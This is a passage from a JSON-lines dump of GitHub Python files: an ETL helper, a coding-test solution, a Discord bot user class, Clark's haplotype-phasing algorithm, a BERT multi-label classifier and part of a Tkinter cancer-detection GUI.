Takes in name of dim as stored in dicts here\"\"\"\n return dicts['location'].add_row(row, loc_level_idx, loc_idx, smallest_area_name, skip_bigger_area_rows=skip_bigger_area_rows)\n\n# consider removing\ndef postcode_sector_to_loc_list(sector: str):\n \"\"\"Wrapper for LocationDimension.postcode_sector_to_loc_list.\"\"\"\n return dimension.LocationDimension.postcode_sector_to_loc_list(sector)\n\ndef get_headers(dict_name):\n \"\"\"Get the headers of a given dimension\"\"\"\n return dicts[dict_name].headers\n\n\n","repo_name":"TransportScotland/payment-card-spend-data-processing","sub_path":"etl_legacy/shared_funcs.py","file_name":"shared_funcs.py","file_ext":"py","file_size_in_byte":15461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30421504487","text":"import copy\n\nn = int(input())\nk = int(input())\n\nlst = []\n\nfor i in range(n):\n lst.append((input()))\n\nanswer = \"\"\n\nresultt = []\ndef finding(t):\n global answer\n global k\n if len(t) == k:\n if answer not in resultt:\n result = copy.deepcopy(answer)\n resultt.append(result)\n \n else:\n for i in range(len(lst)):\n if i in t:\n continue\n else:\n t.append(i)\n answer += lst[i]\n r = len(answer)\n l = len(lst[i])\n # print(t)\n finding(t)\n t.pop()\n answer = answer[:r-l]\n \n\nfinding([])\n\nprint(len(resultt))\n\n\n","repo_name":"JunHyungJang/codingtest","sub_path":"Baekjoon/recursion/5568.py","file_name":"5568.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21651709167","text":"import json, discord\nfrom cDatabase.DB_Users import DB_Users\nfrom cDatabase.KV_Database import KV_Database\nfrom helper.CF_API import CF_API\n\nconfig = json.load(open('config.json', 'r'))\ndatabase_users = DB_Users(\"db_users\")\ncf_ranking = KV_Database('CodeForces_Ranking')\ncf_api = CF_API()\n\n# ------------------------------------ { User } ------------------------------------ # \nclass User:\n id = None\n handle = None\n client = None\n\n # ------------------ [ __init__() ] ------------------ # \n # Initializes id and handle based on given parameters\n def __init__(self, id = '', handle = '', client = None):\n if (id != '' and handle != ''):\n self.id, self.handle = str(id), handle\n elif (id != ''):\n self.id = str(id)\n self.handle = database_users.find_handle(self.id)\n elif (handle != ''): \n self.id = str(database_users.find_id(self.handle))\n self.handle = handle\n self.client = client\n\n # ------------------ [ is_admin() ] ------------------ # \n # Returns true if user is Ahmad, Khaled, Miguel, or MB, otherwise false\n def is_admin(self):\n if self.id in [\n '763289145288032268',\n '763319277540605972',\n '763345404674048020',\n '402887362046066698']: return True\n return False\n\n # ------------------ [ tag() ] ------------------ # \n # Tags the user that called the command\n def tag(self):\n return '<@!' 
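# The recursive search in the Baekjoon 5568 solution above enumerates the distinct
# numbers formed by concatenating k of the n cards, deduplicating with a membership
# test on a list. The same count expressed directly with itertools (equivalent,
# with set-based dedup):
from itertools import permutations

def distinct_numbers(cards, k):
    return len({''.join(p) for p in permutations(cards, k)})

assert distinct_numbers(['1', '2', '12'], 2) == 6  # {'12', '21', '112', '121', '122', '212'}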
+ str(self.id) + '>'\n\n # ------------------ [ is_taken_id() ] ------------------ # \n # Checks if the ID is already registered\n def is_taken_id(self):\n if (self.id == None): return True\n return database_users.is_taken_id(self)\n\n # ------------------ [ is_taken_handle() ] ------------------ # \n # Checks if an ID is already registered to another handle\n def is_taken_handle(self):\n if (self.handle == None): return True\n return database_users.is_taken_handle(self)\n\n # ------------------ [ is_registered() ] ------------------ # \n # Checks if user is in the database\n def is_registered(self):\n if (self.id == None or self.handle == None): return False\n return database_users.is_registered(self)\n\n \n # ------------------ [ register() ] ------------------ # \n # Registers the user to the bot's database\n def register(self):\n if (self.id == None or self.handle == None): return False\n return database_users.register(self)\n\n \n # ------------------ [ change_handle() ] ------------------ # \n # Changes the user's handle in the database\n def change_handle(self, new_handle):\n if (self.handle == new_handle): return False\n if (not self.is_registered()): return False\n self.handle = new_handle\n return database_users.change_handle(self, new_handle)\n\n \n # ------------------ [ delete() ] ------------------ # \n # Deletes the user from the database\n def delete(self):\n # Remove from contests\n if (self.id == None or self.handle == None): return False\n return database_users.remove_user(self)\n\n # ------------------ [ __str__() ] ------------------ # \n # Returns a string representation of the user with their id and handle\n def __str__(self):\n return \"User: \" + str(self.id) + ' ' + str(self.handle)\n\n # ------------------ [ add_role() ] ------------------ # \n # Adds a role to the to the user in the Discord server\n async def add_role(self, _role):\n guild = self.client.get_guild(config['guild_id'])\n member = await guild.fetch_member(int(self.id))\n role = discord.utils.get(member.guild.roles, name = _role)\n await member.add_roles(role)\n\n \n # ------------------ [ get_roles() ] ------------------ # \n # return a list of all Discord roles of the user\n async def get_roles(self):\n guild = self.client.get_guild(config['guild_id'])\n member = await guild.fetch_member(int(self.id))\n return member.roles\n\n \n # ------------------ [ has_role() ] ------------------ # \n # Returns true if the user is a member of the specified role\n async def has_role(self, _role):\n guild = self.client.get_guild(config['guild_id'])\n member = await guild.fetch_member(int(self.id))\n role = discord.utils.get(member.guild.roles, name = _role)\n return role in member.roles\n\n # ------------------ [ remove_role() ] ------------------ # \n # Removes the role from the specified member\n async def remove_role(self, _role):\n guild = self.client.get_guild(config['guild_id'])\n member = await guild.fetch_member(int(self.id))\n role = discord.utils.get(member.guild.roles, name = _role)\n await member.remove_roles(role)\n\n # ------------------ [ get_different_roles() ] ------------------ # \n # returns a list of all the CodeForces related roles that are not\n # up-to-date with the user's current rank on CodeForces\n async def get_different_roles(self, role):\n roles = await self.get_roles()\n x = cf_ranking.get(role)\n lst = []\n \n for r in roles:\n if r.name in cf_ranking.keys() and cf_ranking.get(r.name) != x:\n lst.append(r.name)\n\n return lst\n\n async def update_roles(self):\n rank = 
cf_api.user_rank(self)\n lst = await self.get_different_roles(rank)\n for r in lst: await self.remove_role(r)\n await self.add_role(rank)\n","repo_name":"KhaledChehabeddine/aub_cp_discord_bot","sub_path":"helper/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38196971006","text":"import numpy as np\nimport csv\nimport pdb\nimport itertools as it\nfrom progress.bar import Bar\n\n# Load data as 2d int array\ndef load(file_name):\n\tdata = []\n\twith open(file_name, newline=\"\\n\") as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=' ')\n\t\tfor row in reader:\n\t\t\tdata.append([int(val) for val in row])\n\treturn data\n\n# Phase haplotypes from unambiguous genotypes\n# TODO: assign 0 or 1 based on observed frequency\ndef gen_2_haps(genotype):\n\thap1, hap2 = [], []\n\tfor gen in genotype:\n\t\tif gen == 0:\n\t\t\thap1.append(0)\n\t\t\thap2.append(0)\n\t\tif gen == 2:\n\t\t\thap1.append(1)\n\t\t\thap2.append(1)\n\t\tif gen == 1:\n\t\t\thap1.append(0)\n\t\t\thap2.append(1) \n\treturn hap1, hap2\n\n# Return 2d array of all known haplotypes\ndef get_known_haps(haplotypes,window_len):\n\tnum_snps = len(haplotypes)\n\tnum_haps = len(haplotypes[0])\n\tknown_haps = []\n\tfor i in range(num_haps):\n\t\thaplotype = [row[i] for row in haplotypes]\n\t\tfor j in range(0, num_snps, window_len):\n\t\t\thaplotype_segment = haplotype[j:j+window_len]\n\t\t\tif haplotype_segment.count(-1) == 0 and haplotype_segment not in known_haps:\n\t\t\t\tknown_haps.append(haplotype_segment)\n\treturn known_haps\n\n# Phase all unambiguous haplotypes of a given length\ndef fill_known_haps(data,window_len):\n\tnum_snps = len(data)\n\tnum_indiv = len(data[0])\n\t#print(\"num snps, indv = {} {}\".format(num_snps,num_indiv))\n\thaplotypes = np.zeros((num_snps,2*num_indiv),dtype=np.int)\n\thaplotypes.fill(-1)\n\tknown_haps = []\n\tfor i in range(num_indiv):\n\t\tgenotype = [row[i] for row in data]\n\t\tfor j in range(0,num_snps,window_len):\n\t\t\tgenotype_segment = genotype[j:j+window_len]\n\t\t\tif genotype_segment.count(1) < 2:\n\t\t\t\thap1, hap2 = gen_2_haps(genotype_segment)\n\t\t\t\tif hap1 not in known_haps:\n\t\t\t\t\tknown_haps.append(hap1)\n\t\t\t\tif hap2 not in known_haps:\n\t\t\t\t\tknown_haps.append(hap2)\n\t\t\t\thap1_np = np.array(hap1)\n\t\t\t\thap2_np = np.array(hap2)\n\t\t\t\tfor k in range(window_len):\n\t\t\t\t\thaplotypes[j+k][2*i] = hap1[k]\n\t\t\t\t\thaplotypes[j+k][2*i+1] = hap2[k]\n\treturn haplotypes, known_haps\n\n# Helper function for adding two haplotypes\ndef add_haplotypes(hap1, hap2):\n add_result = [hap1[i] +hap2[i] for i in range(len(hap1))]\n return add_result\n\n# Helper function for subtracting two haplotypes\ndef subtract_genhap(genotype,haplotype):\n\tsub_result = [genotype[i] - haplotype[i] for i in range(len(genotype))]\n\treturn sub_result\n\n# Makes a dictionary of all possible pair-wise combinations of known haplotypes\n# TODO: Remove incompatible haplotypes from known set before calling func in Clark's\n#\t\tto reduce # of comparisons.\ndef make_hap_map(known_set):\n hap_map = {}\n all_combos = list(it.combinations(known_set, 2))\n for pair in all_combos:\n hap_map[str(add_haplotypes(pair[0], pair[1]))] = [pair[0], pair[1]]\n return hap_map\n\n# Infer haplotype 2 if genotype and haplotype 1 make it unambiguous \ndef get_hap2_from_known_hap1(genotype, known_set):\n def validHap(haplotype):\n valid = True\n for element in haplotype:\n if element 
!= 0 and element != 1: # value comparison; 'is' checks object identity and is unreliable for ints\n valid = False\n return valid\n for h1 in known_set:\n h2 = subtract_genhap(genotype, h1)\n if validHap(h2):\n return h1, h2\n return [],[]\n\n# Guess rest of haplotypes that Clark's algorithm couldn't phase\n# TODO: Incorporate frequency so that we don't randomly guess\ndef guess_rest(data,haplotypes):\n\tnum_snps = len(data)\n\tnum_indiv = len(data[0])\n\tfor i in range(num_indiv):\n\t\tfor j in range(num_snps):\n\t\t\tif haplotypes[j][2*i] == -1 and haplotypes[j][2*i+1] == -1:\n\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\thaplotypes[j][2*i], haplotypes[j][2*i+1] = 0,0\n\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\thaplotypes[j][2*i], haplotypes[j][2*i+1] = 0,1\n\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\thaplotypes[j][2*i], haplotypes[j][2*i+1] = 1,1\n\t\t\telif haplotypes[j][2*i] == -1:\n\t\t\t\tif haplotypes[j][2*i+1] == 0:\n\t\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\t\thaplotypes[j][2*i] = 0\n\t\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\t\thaplotypes[j][2*i] = 1\n\t\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\t\t#should never be called\n\t\t\t\t\t\tprint(\"SOMETHINGS WRONG\")\n\t\t\t\t\t\thaplotypes[j][2*i] = 1\n\t\t\t\telif haplotypes[j][2*i+1] == 1:\n\t\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\t\t#should never be called\n\t\t\t\t\t\tprint(\"SOMETHINGS WRONG\")\n\t\t\t\t\t\thaplotypes[j][2*i] = 0\n\t\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\t\thaplotypes[j][2*i] = 0\n\t\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\t\thaplotypes[j][2*i] = 1\n\t\t\telif haplotypes[j][2*i+1] == -1:\n\t\t\t\tif haplotypes[j][2*i] == 0:\n\t\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 0\n\t\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 1\n\t\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\t\t#should never be called\n\t\t\t\t\t\tprint(\"SOMETHINGS WRONG\")\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 1\n\t\t\t\telif haplotypes[j][2*i] == 1:\n\t\t\t\t\tif data[j][i] == 0:\n\t\t\t\t\t\t#should never be called\n\t\t\t\t\t\tprint(\"SOMETHINGS WRONG\")\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 0\n\t\t\t\t\telif data[j][i] == 1:\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 0\n\t\t\t\t\telif data[j][i] == 2:\n\t\t\t\t\t\thaplotypes[j][2*i+1] = 1\n\treturn haplotypes\n\n# Main algorithm to phase genotype data\ndef clarks(data, window_len):\n\tnum_snps = len(data)\n\tnum_indiv = len(data[0])\n\thaplotypes, known_haps = fill_known_haps(data,window_len)\n\n\thap_map = make_hap_map(known_haps)\n\tfor num_iter in range(10):\n\t\tcurr_known_haps_size = len(known_haps)\n\t\t#bar_i = Bar('Phasing Individuals...', max=num_indiv)\n\t\tfor i in range(num_indiv):\n\t\t\tgenotype = [row[i] for row in data]\n\t\t\t#bar_j = Bar('SNPs', max=(int)(num_snps/window_len))\n\t\t\tfor j in range(0,num_snps,window_len):\n\t\t\t\t#print(\"Iteration {}, Indiv {}, Window range [{},{}]\".format(num_iter,i,j,j+window_len))\n\t\t\t\tgenotype_segment = genotype[j:j+window_len]\n\t\t\t\tseg_key = str(genotype_segment)\n\n\t\t\t\tif seg_key in hap_map:\n\t\t\t\t\thap1, hap2 = hap_map[seg_key]\n\t\t\t\t\thap1_np = np.array(hap1)\n\t\t\t\t\thap2_np = np.array(hap2)\n\t\t\t\t\tfor k in range(window_len):\n\t\t\t\t\t\thaplotypes[j+k][2*i] = hap1[k]\n\t\t\t\t\t\thaplotypes[j+k][2*i+1] = hap2[k]\n\t\t\t\telse:\n\t\t\t\t\thap1, hap2 = get_hap2_from_known_hap1(genotype_segment,known_haps)\n\t\t\t\t\tif len(hap1) > 0 and len(hap2) > 0:\n\t\t\t\t\t\thap1_np = np.array(hap1)\n\t\t\t\t\t\thap2_np = np.array(hap2)\n\t\t\t\t\t\tfor k in range(window_len):\n\t\t\t\t\t\t\thaplotypes[j+k][2*i] = hap1[k]\n\t\t\t\t\t\t\thaplotypes[j+k][2*i+1] = 
hap2[k]\n\t\t\t\t\t\tknown_haps.append(hap2)\n\t\t\t\t\t\thap_map = make_hap_map(known_haps)\n\t\t\t\t#bar_j.next()\n\t\t\t#bar_j.finish()\n\t\t\t#bar_i.next()\n\t\t#decrease window size if we didn't add any to our known set\n\t\tif len(known_haps) - curr_known_haps_size == 0:\n\t\t\tif window_len == 30:\n\t\t\t\twindow_len = 20\n\t\t\telif window_len == 20:\n\t\t\t\twindow_len = 15\n\t\t\telif window_len == 15:\n\t\t\t\twindow_len = 10\n\t\t\telif window_len == 10:\n\t\t\t# \twindow_len = 10\n\t\t\t# elif window_len == 10:\n\t\t\t# \twindow_len = 8\n\t\t\t# elif window_len == 8:\n\t\t\t# \twindow_len = 6\n\t\t\t# elif window_len == 6:\n\t\t\t\tbreak\n\t\t\tknown_haps = get_known_haps(haplotypes,window_len)\n\t\t#bar_i.finish()\n\n\t#print(\"# of -1 before guess =\", np.count_nonzero(haplotypes==-1))\n\tfinal_haplotypes = guess_rest(data,haplotypes)\n\t#print(\"# of -1 before guess =\", np.count_nonzero(final_haplotypes==-1))\n\n\treturn final_haplotypes\n\n# Divides up data into blocks and runs Clark's algorithm one block at at time.\nif __name__ == \"__main__\":\n\tdata = load('../data/test data/test_data_1.txt')\n\n\tnum_snps = len(data)\n\tnum_indivs = len(data[0])\n\n\t# Hyperparameters for splitting up the dataset\n\t# TODO: Optimize and choose best values\n\tblock_size = 180\n\twindow_len = 30\n\n\thaplotypes = []\n\n\tif len(data) % block_size == 0:\n\t\tnum_blocks = (int)(len(data)/block_size)\n\telse:\n\t\tnum_blocks = (int)(len(data)/block_size) + 1\n\t#print((int)(len(data)/block_size) + math.ceil((num_snps % block_size) / block_size)\n\n\tprint(\"********** Clark's Algorithm **********\")\n\tprint(\"# of SNP sites =\", num_snps)\n\tprint(\"# of Individuals =\", num_indivs)\n\tprint(\"Block Size =\", block_size)\n\tprint(\"Window Length =\", window_len)\n\tprint(\"# of Blocks =\", num_blocks,\"\\n\")\n\tprint(\"Starting...\")\n\t\n\tbar = Bar('Progress Bar', max=num_blocks,suffix = '%(percent).1f%% - %(eta)ds')\n\tfor i in range(num_blocks):\n\t\t#print(\"Working on block #{} out of {}\".format(i+1, num_blocks))\n\t\tdata_block = data[i*block_size:i*block_size+block_size]\n\t\tif i == 0:\n\t\t\thaplotypes_block = clarks(data_block,window_len)\n\t\t\thaplotypes = haplotypes_block\n\t\telif i == num_blocks-1 and len(data[i*block_size:]) > 0:\n\t\t\tfinal_data_block = data[i*block_size:]\n\t\t\tfinal_num_snps = len(final_data_block)\n\t\t\tfinal_num_indiv = len(final_data_block[0])\n\t\t\tfinal_haplotypes_block = np.zeros((final_num_snps,2*final_num_indiv),dtype=np.int)\n\t\t\tfinal_haplotypes_block.fill(-1)\n\t\t\tfinal_haplotypes_block = guess_rest(final_data_block, final_haplotypes_block)\n\t\t\thaplotypes = np.concatenate((haplotypes,final_haplotypes_block),axis=0)\n\t\telse:\n\t\t\thaplotypes_block = clarks(data_block,window_len)\n\t\t\thaplotypes = np.concatenate((haplotypes,haplotypes_block),axis=0)\n\t\tbar.next()\n\tbar.finish()\n\tprint(\"********** Clark's Algorithm **********\")\n\n\t#print(\"Final haps row, col = {} {}\".format(len(haplotypes), len(haplotypes[0])))\n\tnp.savetxt('../data/test data/test_data_1_my_sol.txt', haplotypes, fmt='%i', delimiter = ' ')\n\n\n\t\n\n\n\n\n\n\n\n\n\n\n\t","repo_name":"danielpark95/haplotype-phasing","sub_path":"src/clarks.py","file_name":"clarks.py","file_ext":"py","file_size_in_byte":8990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74112317608","text":"from transformers import BertPreTrainedModel, BertModel, AlbertPreTrainedModel, AlbertModel, RobertaModel\nfrom 
transformers import AlbertConfig, BertConfig, PretrainedConfig, RobertaConfig, AutoConfig\n\nfrom torch import nn\nfrom torch.nn import BCEWithLogitsLoss\nfrom collections import OrderedDict\n\n\nclass BertForMultiLabelClassification(BertPreTrainedModel):\n \"\"\"\n 参考 transformer BertForSequenceClassification 3.0.2\n 主要修改点:损失函数\n \"\"\"\n\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, config.num_labels)\n\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n output_attentions=None,\n output_hidden_states=None,\n ):\n r\"\"\"\n labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):\n Labels for computing the sequence classification/regression loss.\n Indices should be in :obj:`[0, ..., config.num_labels - 1]`.\n If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),\n If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).\n\n Returns:\n :obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration\n (:class:`~transformers.BertConfig`) and inputs:\n loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when :obj:`label` is provided):\n Classification (or regression if config.num_labels==1) loss.\n logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, config.num_labels)`):\n Classification (or regression if config.num_labels==1) scores (before SoftMax).\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned\n when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or\n when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n outputs = self.bert(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n )\n\n pooled_output = outputs[1]\n\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n\n outputs = (logits,) + outputs[2:] # add hidden states and attention if they are here\n\n if labels is not None:\n loss_fct = BCEWithLogitsLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1, self.num_labels))\n outputs = (loss,) + outputs\n\n return outputs # (loss), logits, (hidden_states), (attentions)\n\n\nMODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING = OrderedDict(\n [\n (BertConfig, BertForMultiLabelClassification)\n ]\n)\n\nclass AutoModelForMultiLabelClassification:\n \"\"\"\n 参考 transformer 
AutoModelForSequenceClassification 3.0.2, 目前只实现了 Albert Bert Roberta\n 主要修改 MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING 配置\n \"\"\"\n\n def __init__(self):\n raise EnvironmentError(\n \"AutoModelForSequenceClassification is designed to be instantiated \"\n \"using the `AutoModelForSequenceClassification.from_pretrained(\"\n \"pretrained_model_name_or_path)` or \"\n \"`AutoModelForSequenceClassification.from_config(config)` methods.\"\n )\n\n @classmethod\n def from_config(cls, config):\n r\"\"\" Instantiates one of the base model classes of the library\n from a configuration.\n\n Note:\n Loading a model from its configuration file does **not** load the model weights.\n It only affects the model's configuration. Use :func:`~transformers.AutoModel.from_pretrained`\n to load the model weights\n\n Args:\n config (:class:`~transformers.PretrainedConfig`):\n The model class to instantiate is selected based on the configuration class:\n\n - isInstance of `distilbert` configuration class: :class:\n `~transformers.DistilBertForSequenceClassification` (DistilBERT model)\n - isInstance of `albert` configuration class: :class:`\n ~transformers.AlbertForSequenceClassification` (ALBERT model)\n - isInstance of `camembert` configuration class: :class:\n `~transformers.CamembertForSequenceClassification` (CamemBERT model)\n - isInstance of `xlm roberta` configuration class: :class:\n `~transformers.XLMRobertaForSequenceClassification` (XLM-RoBERTa model)\n - isInstance of `roberta` configuration class: :class:\n `~transformers.RobertaForSequenceClassification` (RoBERTa model)\n - isInstance of `bert` configuration class: :class:\n `~transformers.BertForSequenceClassification` (Bert model)\n - isInstance of `xlnet` configuration class: :class:\n `~transformers.XLNetForSequenceClassification` (XLNet model)\n - isInstance of `xlm` configuration class: :class:\n `~transformers.XLMForSequenceClassification` (XLM model)\n - isInstance of `flaubert` configuration class: :class:\n `~transformers.FlaubertForSequenceClassification` (Flaubert model)\n\n\n Examples::\n # Download configuration from S3 and cache.\n config = BertConfig.from_pretrained('bert-base-uncased')\n\n # E.g. 
model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelForSequenceClassification.from_config(config)\n \"\"\"\n for config_class, model_class in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.items():\n if isinstance(config, config_class):\n return model_class(config)\n raise ValueError(\n \"Unrecognized configuration class {} for this kind of AutoModel: {}.\\n\"\n \"Model type should be one of {}.\".format(\n config.__class__,\n cls.__name__,\n \", \".join(c.__name__ for c in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys()),\n )\n )\n\n # 模型路径和模型配置\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the sequence classification model classes of the library\n from a pre-trained model configuration.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n based on the `model_type` property of the config object, or when it's missing,\n falling back to using pattern matching on the `pretrained_model_name_or_path` string:\n\n - `distilbert`: :class:`~transformers.DistilBertForSequenceClassification` (DistilBERT model)\n - `albert`: :class:`~transformers.AlbertForSequenceClassification` (ALBERT model)\n - `camembert`: :class:`~transformers.CamembertForSequenceClassification` (CamemBERT model)\n - `xlm-roberta`: :class:`~transformers.XLMRobertaForSequenceClassification` (XLM-RoBERTa model)\n - `roberta`: :class:`~transformers.RobertaForSequenceClassification` (RoBERTa model)\n - `bert`: :class:`~transformers.BertForSequenceClassification` (Bert model)\n - `xlnet`: :class:`~transformers.XLNetForSequenceClassification` (XLNet model)\n - `flaubert`: :class:`~transformers.FlaubertForSequenceClassification` (Flaubert model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Args:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download,\n e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3,\n e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :\n func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (\n e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True\n and a configuration object should be provided as ``config`` argument. 
This loading path\n is slower than converting the TensorFlow checkpoint in a PyTorch model using the\n provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaining positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation.\n Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the ``shortcut-name`\n ` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and\n is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path``\n and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionary for the model to use instead of a state dictionary\n loaded from saved weights file. This option can be used if you want to create a model\n from a pretrained configuration but load your own weights. In this case though,\n you should check if using :func:`~transformers.PreTrainedModel.save_pretrained`\n and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n\n resume_download: (`optional`) boolean, default False:\n Do not delete incompletely recieved file. Attempt to resume the download if such a file exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n These arguments will be passed to the configuration and the model.\n\n Examples::\n # Download model and configuration from S3 and cache.\n model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased')\n # E.g. 
model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelForSequenceClassification.from_pretrained('./test/bert_model/')\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModelForSequenceClassification.from_pretrained(\n './tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n config = kwargs.pop(\"config\", None)\n if not isinstance(config, PretrainedConfig):\n config = AutoConfig.from_pretrained(pretrained_model_name_or_path, **kwargs)\n\n for config_class, model_class in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.items():\n if isinstance(config, config_class):\n return model_class.from_pretrained(pretrained_model_name_or_path, *model_args, config=config, **kwargs)\n raise ValueError(\n \"Unrecognized configuration class {} for this kind of AutoModel: {}.\\n\"\n \"Model type should be one of {}.\".format(\n config.__class__,\n cls.__name__,\n \", \".join(c.__name__ for c in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys()),\n )\n )\n","repo_name":"liguodongiot/nlp-app-samples","sub_path":"tests/iter_version_dev/V1_0_0/automodel_multilabel.py","file_name":"automodel_multilabel.py","file_ext":"py","file_size_in_byte":14326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29044033503","text":"from ctypes.wintypes import SIZE\nfrom tkinter import *\nfrom tkinter import END,filedialog\n \nfrom PIL import ImageTk, Image\nimport pre_cancer_detect as pre\nimport tkinter as tk\n\n\n# Create object \nroot = Tk()\n \n# Adjust size \nroot.geometry(\"590x350\")\n\n\nnew_pic = ImageTk.PhotoImage(Image.open(\"dna-background.jpg\").resize((2000, 1000), Image.ANTIALIAS))\nimg =Image.open('dna-background.jpg')\nbg = ImageTk.PhotoImage(img)\n# Create Canvas\ncanvas1 = Canvas( root, width = 400,\n height = 600)\n \ncanvas1.pack(fill = \"both\", expand = True)\n \n# Display image\ncanvas1.create_image( 0, 0, image=new_pic,\n anchor = \"nw\")\n \n\nroot.state('zoomed')\n\n\n\nlabel_file_explorer =tk.Label(canvas1,\n text = \"File Explorer using Tkinter\",\n font=20,\n width=50,\n height=1,\n fg = \"blue\")\n\ndef browseFiles():\n global p\n filename = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = ((\"Text files\",\n \"*.txt*\"),\n (\"all files\",\n \"*.*\")))\n label_file_explorer.configure(text=\"File Opened: \"+filename)\n p=filename\n \n\nbutton_explore =tk.Button(canvas1,\n width=50,\n height=1,\n text = \"Browse Files \",\n font=50,\n command=browseFiles\n \n )\n \n\n\n\ndef draw():\n \n train,test,error=pre.cancer(p)\n\n train_score=tk.Label(canvas1,text=\"Train Score: \",font=30)\n 